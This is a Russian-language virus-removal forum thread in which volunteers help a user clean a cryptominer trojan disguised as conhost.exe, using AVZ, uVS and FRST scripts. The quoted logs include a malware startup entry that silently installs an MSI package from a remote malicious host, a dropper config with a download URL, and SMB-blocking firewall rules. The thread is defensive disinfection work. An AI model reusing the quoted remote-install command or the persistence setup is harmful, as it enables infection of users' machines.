Троян, маскирующийся под conhost.exe [HEUR:Trojan.Win32.Generic]

Примерно через минуту после загрузки системы появляется процесс conhost.exe, который я вижу в process explorer, но не вижу в диспетчере задач Windows. Сам файл conhost.exe находится в папке C:\Windows\Temp. Одновременно с этим в папке C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 появляется файл 0509.exe с той же хэш-суммой, что и conhost.exe. Файл детектируется на virustotal, как троян с показателем выявления 55 / 68. Также в папке Content.IE5 присутствует текстовый файл со следующим содержимым:
[config]
url=about:blank
exe=hxxp://xxxxxxx/0509.exe
Троян внешне никак себя не проявляет, систему не грузит. Процесс через какое-то время сам закрывается. Сканирование утилитой Dr.Web CureIt! ничего не даёт. Утилита находит эти файлы, удаляет их, но после перезагрузки они появляются вновь.

Уважаемый(ая) [B]che_guevara[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
TerminateProcessByName('c:\windows\temp\conhost.exe');
QuarantineFile('c:\windows\temp\conhost.exe', '');
DeleteFile('c:\windows\temp\conhost.exe', '');
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
BC_ImportDeletedList;
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
BC_Activate;
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2018/08/24)
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block[/code]
Установите [URL="http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212"]хотфикс KB4012212[/URL], закрывающий опаснейшую уязвимость, которую используют кроме вашего трояна нашумевшие в прошлом году шифровальщики WannaCry и Petya/NotPetya, а также многие майнеры. Иначе не избавитесь от заразы.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].

Прикрепляю образ автозапуска

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[CODE];uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
zoo %SystemRoot%\TEMP\CONHOST.EXE
addsgn 19E4408D5D6A4C720BD4472E7DC9128E61AFFC7DDDDF1BF2C9E6CD3D95D4714C23EFCCF2EEDCD96C2F8F3B5BD9704632E10C0814860A49A36952A44914CE3890 8 Trojan.BtcMine.2855 [DrWeb] 7

chklst
delvir

delref %SystemRoot%\TEMP\5F76D1A3-D2C4-4AA5-9DC3-665C9EBF80CA
delref %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\WCT8008.TMP
delref WMI_.[BVTFILTER]
apply
deltmp
czoo
restart[/CODE]Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Сообщите, что с проблемой.

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.

После выполнения скрипта и перезагрузки процесс conhost.exe появляется снова. Прилагаю запрошенные логи.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Выполнено

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
CloseProcesses:
() C:\Windows\Temp\conhost.exe
C:\Windows\Temp\conhost.exe
2018-08-27 20:36 - 2018-08-27 20:36 - 000390938 _____ C:\unp306867641820152852i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000389673 _____ C:\unp306867641823272857i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000384061 _____ C:\unp306867641807828830i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000382928 _____ C:\unp306867641810012834i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000381580 _____ C:\unp306867641817500847i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000377768 _____ C:\unp306867641812040838i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000384652 _____ C:\unp306867641771480767i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000384307 _____ C:\unp306867641756348740i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000383958 _____ C:\unp306867641730452694i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381850 _____ C:\unp306867641768828762i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381398 _____ C:\unp306867641778344779i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381212 _____ C:\unp306867641763056752i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000380869 _____ C:\unp306867641740124711i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000379780 _____ C:\unp306867641780684783i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000379474 _____ C:\unp306867641750264729i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000361576 _____ C:\unp306867641649644553i-manual.mdmp
Task: {2F41D0F1-B9C5-4D42-AB73-81B6BFDEA06D} - \ok -> No File <==== ATTENTION
Task: {67E802C7-0914-4514-A7E4-13916E68CF08} - no filepath
FirewallRules: [{D7E616B4-2902-4535-83EB-D28678E59CE4}] => (Block) LPort=445
FirewallRules: [{19A2E3EE-30B1-4024-A6A3-78633D56C727}] => (Block) LPort=445
FirewallRules: [{F0E15AD5-D7A9-4B08-BD4C-3FE75D1D878F}] => (Block) LPort=445
FirewallRules: [{F3C17877-2910-425A-B14B-43630D969CF9}] => (Block) LPort=445
FirewallRules: [{A40FC769-C7A6-4D68-8A6B-DBE620876F6C}] => (Block) LPort=445
FirewallRules: [{99B946B5-CDD8-477D-B978-635391948152}] => (Block) LPort=445
FirewallRules: [{F4538793-CC70-4EB0-8EB5-740E30D88105}] => (Block) LPort=445
FirewallRules: [{64E10128-63E8-4275-BB1C-DD3B99F744F8}] => (Block) LPort=445
FirewallRules: [{E58B4451-F570-4B46-B0E2-881F3D831EFB}] => (Block) LPort=445
FirewallRules: [{7695674B-BEAB-4431-B1E3-69D991E0409B}] => (Block) LPort=445
FirewallRules: [{08418E55-E1DD-4569-A023-485DF770FE98}] => (Block) LPort=445
FirewallRules: [{EBD784D5-0725-46B1-A5FD-B947D26F2761}] => (Block) LPort=445
FirewallRules: [{B4750914-2D80-4735-8E4A-DB1E1992BC9E}] => (Block) LPort=445
FirewallRules: [{5DB212C9-E8B1-4F0F-944F-56569EBD2DBA}] => (Block) LPort=445
FirewallRules: [{FC78232D-EADF-48D6-8BAC-B45766049747}] => (Block) LPort=445
Reboot:[/CODE]и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Скопируйте скрипт из окна "код" ниже в буфер обмена:
[CODE];uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
sreg
delall %SystemRoot%\TEMP\CONHOST.EXE
delref WMI_.[BVTFILTER]
areg
apply
[/CODE]Закройте все программы, запустите командный файл script.cmd из папки с UVS. Когда откроется окно со скриптом, нажмите "Выполнить".
Компьютер перезагрузится.

Новый лог выполнения скрипта прикрепите.

Выполнено

Скачайте и запустите TDSSKiller: [url]http://support.kaspersky.ru/viruses/disinfection/5350[/url].
Файл C:\TDSSKiller.***_log.txt приложите в теме (лучше в архиве) где *** - версия программы, дата и время запуска.)

TDSSKiller ничего подозрительного не обнаруживает

Проблема сохраняется?
Проверьте уязвимость через [URL="http://omerez.com/eternalblues/"]ETERNAL BLUES[/URL]. Если найдена на этом компьютере - [URL="https://support.microsoft.com/ru-ru/help/2696547/how-to-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and-windows"]отключите протокол SMB версии 1[/URL].

Уязвимость не найдена, проблема сохраняется.

Сделайте лог [url=https://virusinfo.info/showthread.php?t=218706&p=1480220&viewfull=1#post1480220]сканирования МВАМ.[/url]

Обнаруживается всё тот же conhost.exe в папке temp

Выполните скрипт в UVS:[CODE];uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
addsgn 19E4408D5D6A4C720BD4472E7DC9128E61AFFC7DDDDF1BF2C9E6CD3D95D4714C23EFCCF2EEDCD96C2F8F3B5BD9704632E10C0814860A49A36952A44914CE3890 8 Trojan.BtcMine.2855 [DrWeb] 7

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\IOBIT\IOBIT UNINSTALLER\UNINSTALER_SKIPUAC.EXE
zoo %Sys32%\TASKS\HPWEBREG.EXE
delall %Sys32%\TASKS\HPWEBREG.EXE
czoo
restart[/CODE]В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Запустите [URL="https://yadi.sk/d/HRYif3kb3aeDju"]AutorunsVTchecker[/URL], дождитесь окончания его работы.

Сделайте новый полный образ автозапуска uVS, загрузите в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку.

Сделано:
[url]https://yadi.sk/d/exE5jGlL3aeG9k[/url]

Сделайте новый полный образ автозапуска uVS в безопасном режиме загрузки системы. Что-то хорошо маскируется, CONHOST.EXE даже не в автозагрузке...

Похоже, гораздо быстрее можно было бы решить проблему, просто переустановив систему. Но теперь, когда уже потрачено столько времени, хочется докопаться до истины ))
Сделал образ в безопасном режиме: [url]https://yadi.sk/d/q3D9wm5d3aefC7[/url]